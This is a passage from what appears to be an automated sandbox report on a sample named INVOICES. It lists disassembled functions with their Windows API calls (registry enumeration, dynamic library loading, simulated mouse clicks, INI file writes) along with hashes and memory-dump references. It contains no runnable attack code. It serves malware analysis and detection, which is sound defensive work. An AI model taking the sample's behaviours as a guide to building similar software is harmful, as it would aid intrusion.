                                                                                                                                  • Instruction Fuzzy Hash: 1D51C830A00B05DBDB248F69C8946EE77B2EF44332F244729FC25962D1D7F99D588B50
                                                                                                                                  Function 007B00C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0188
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B01C7
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007B020E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 007B023A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B0247
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3440857362-0
                                                                                                                                  • Opcode ID: 3bf0f58f0922b2d25e9fcbdf0e9093be6a7b360b0454d2477d55ea4c27b58722
                                                                                                                                  • Instruction ID: f37011008252fc91327bafac982368e383a4ba6128941f1a759a84b338aa9f42
                                                                                                                                  • Opcode Fuzzy Hash: 3bf0f58f0922b2d25e9fcbdf0e9093be6a7b360b0454d2477d55ea4c27b58722
                                                                                                                                  • Instruction Fuzzy Hash: 6B511A71108204EFD714EB58DC85FAEB7E8BF84714F04891DF595871A2DB38E905CB52
                                                                                                                                  Function 007AD9DC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007ADA3B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 007ADABE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 007ADADA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 007ADB1B
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007ADB35
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327935632-0
                                                                                                                                  • Opcode ID: 178b73d9605ee86ba402c3fd99161942eba34294b3d0a203f7bf9ef58c30dfd2
                                                                                                                                  • Instruction ID: 91032ab9e959b8611d39f01961d6dbb0e04e764986efed66f3a16e21946a6b64
                                                                                                                                  • Opcode Fuzzy Hash: 178b73d9605ee86ba402c3fd99161942eba34294b3d0a203f7bf9ef58c30dfd2
                                                                                                                                  • Instruction Fuzzy Hash: F7512975A00209DFDB10EFA8C888DADB7F4FF49310B05C165E91AAB312DB38AD45CB90
                                                                                                                                  Function 0079E5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0079E6AB
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0079E6D4
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0079E713
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0079E738
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0079E740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  • Opcode ID: f5101bf22b58e9023c31f191c1515ffc3f98c8315137f1663b84b4f6d3bfd8c7
                                                                                                                                  • Instruction ID: 18b4e046bb9ea754bed5236154d1e2cc3bb6fdbd9ac563a1af7e3ad0dab5a1e4
                                                                                                                                  • Opcode Fuzzy Hash: f5101bf22b58e9023c31f191c1515ffc3f98c8315137f1663b84b4f6d3bfd8c7
                                                                                                                                  • Instruction Fuzzy Hash: 37513835A00205DFDF00EF64C985AADBBF5EF48314F1480A9E949AB362CB79ED11DB51
                                                                                                                                  Function 007BA088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: da3278d35ce023cef462a8c330789fcce85ddc5f64e10c186015d177539795b5
                                                                                                                                  • Instruction ID: 4283e48feee47fb74d882028aed234b8f24153fca1a6f216117523f283125e87
                                                                                                                                  • Opcode Fuzzy Hash: da3278d35ce023cef462a8c330789fcce85ddc5f64e10c186015d177539795b5
                                                                                                                                  • Instruction Fuzzy Hash: B941D03590124CBBD760EF2CCC49FE9BBB4EB09360F154265F926A72E1D738AE41CA51
                                                                                                                                  Function 00786700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0078673D
                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00786789
                                                                                                                                  • TranslateMessage.USER32(?), ref: 007867B2
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 007867BC
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007867CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2108273632-0
                                                                                                                                  • Opcode ID: c40af04e87c16c3d091fb3f8b3ca704197bcf7bfb2c77290660daebcb9d4e217
                                                                                                                                  • Instruction ID: 23d8238a0b17815c053de2a0fa72829718f2e0a9bd3f0ce2f946ae32a6ecc015
                                                                                                                                  • Opcode Fuzzy Hash: c40af04e87c16c3d091fb3f8b3ca704197bcf7bfb2c77290660daebcb9d4e217
                                                                                                                                  • Instruction Fuzzy Hash: FC31E370980606BFDB20AFB4CC48FB6BBECAB00718F148225E525C31A1E73DA485D7A4
                                                                                                                                  Function 00788CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00788CF2
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00788D9C
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00788DA4
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00788DB2
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00788DBA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  • Opcode ID: 73afe6b1b6a968b9ccf0d75fa35d831d4e3ebce56873ce769d3300285841b568
                                                                                                                                  • Instruction ID: ad254e7b1daa386847c410342a7af20d17aac492493f58ffce5311aa59fec726
                                                                                                                                  • Opcode Fuzzy Hash: 73afe6b1b6a968b9ccf0d75fa35d831d4e3ebce56873ce769d3300285841b568
                                                                                                                                  • Instruction Fuzzy Hash: A231EE71A00219EBDF00DF68DD4CA9E3BB5EB18315F108229F924EA2D0C7B89D10CBA1
                                                                                                                                  Function 0078B4AE Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0078B4C6
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0078B4E3
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0078B51B
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0078B541
                                                                                                                                  • _wcsstr.LIBCMT ref: 0078B54B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  • Opcode ID: 3da4d686cbc3e5ab3ff910eba8703e497f7bd209902ea6f551638fde5171cecd
                                                                                                                                  • Instruction ID: 2ec317bdf31dffbd4f4ae006c7245d8f3485f7ff8b2af741e0717a53f28f37e2
                                                                                                                                  • Opcode Fuzzy Hash: 3da4d686cbc3e5ab3ff910eba8703e497f7bd209902ea6f551638fde5171cecd
                                                                                                                                  • Instruction Fuzzy Hash: 6C212C31644244BAEB256B79DC09E7B7BA8DF49750F008139FC05CA1A1EFA9DC1093A0
                                                                                                                                  Function 007BB17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BB1C6
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007BB1EB
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007BB203
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 007BB22C
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007A0FA5,00000000), ref: 007BB24A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                  • Opcode ID: fbad48ed3f7c713bcdcfc6ff4133b938e9b2085c638542b20b29de40f5011277
                                                                                                                                  • Instruction ID: 520d19051b5f609438baf498adccc7d618809a62dce9350e32df1dda58e030f1
                                                                                                                                  • Opcode Fuzzy Hash: fbad48ed3f7c713bcdcfc6ff4133b938e9b2085c638542b20b29de40f5011277
                                                                                                                                  • Instruction Fuzzy Hash: 38215E71514619AFCB209F38CC48BEA3BA4FB45721F108724FD26D61E0E7789811DB90
                                                                                                                                  Function 007895C9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007895E2
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00789614
                                                                                                                                  • __itow.LIBCMT ref: 0078962C
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00789654
                                                                                                                                  • __itow.LIBCMT ref: 00789665
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                  • Opcode ID: 78c7c998bf53f7337168b6bdd1ffc373a04a7d7c27ca54414702724b87f33dd0
                                                                                                                                  • Instruction ID: 44fbfb70870791f0906601b6d23bdddf4c6330c638fc3781a88fb229b2669df4
                                                                                                                                  • Opcode Fuzzy Hash: 78c7c998bf53f7337168b6bdd1ffc373a04a7d7c27ca54414702724b87f33dd0
                                                                                                                                  • Instruction Fuzzy Hash: 4921C871B40218FBEB20AA658C8DEFE7BA8DF59714F084065FE04E7251E6788D45C791
                                                                                                                                  Function 007312F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0073134D
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0073135C
                                                                                                                                  • BeginPath.GDI32(?), ref: 00731373
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0073139C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                  • Opcode ID: d6580eec8d631cd77d1e7162a430ee1ea2a878918e11a3f420b9d858387aa7b2
                                                                                                                                  • Instruction ID: ac5b644f7cb01c9a15bf2bdde42f8a80cc90d2b7a16e86c8d304cbd524e0a0f8
                                                                                                                                  • Opcode Fuzzy Hash: d6580eec8d631cd77d1e7162a430ee1ea2a878918e11a3f420b9d858387aa7b2
                                                                                                                                  • Instruction Fuzzy Hash: A4216D30800A08EFEB109F25EC04B797BA8FB007A1F548326F910965B2D77D9895DF98
                                                                                                                                  Function 00794B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00794B61
                                                                                                                                  • __beginthreadex.LIBCMT ref: 00794B7F
                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00794B94
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00794BAA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00794BB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3824534824-0
                                                                                                                                  • Opcode ID: e5603c23a032e3a0589e476787eefe4d7c353089c898701868d3d68d44be9352
                                                                                                                                  • Instruction ID: 4d36f15fbe6867da5bf0b151a31bec449c8a45e207d0c3818ef1c372937399c2
                                                                                                                                  • Opcode Fuzzy Hash: e5603c23a032e3a0589e476787eefe4d7c353089c898701868d3d68d44be9352
                                                                                                                                  • Instruction Fuzzy Hash: 481148B2904208BBCB108FACEC08FAA7FACAB48320F148365F914D3251D279C80087A0
                                                                                                                                  Function 0078852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00788546
                                                                                                                                  • GetLastError.KERNEL32(?,0078800A,?,?,?), ref: 00788550
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0078800A,?,?,?), ref: 0078855F
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0078800A), ref: 00788566
                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0078857D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 883493501-0
                                                                                                                                  • Opcode ID: 6fc51e82a181cfce7101defdacd3c485727fcc5efa54aabc122612f2567eb048
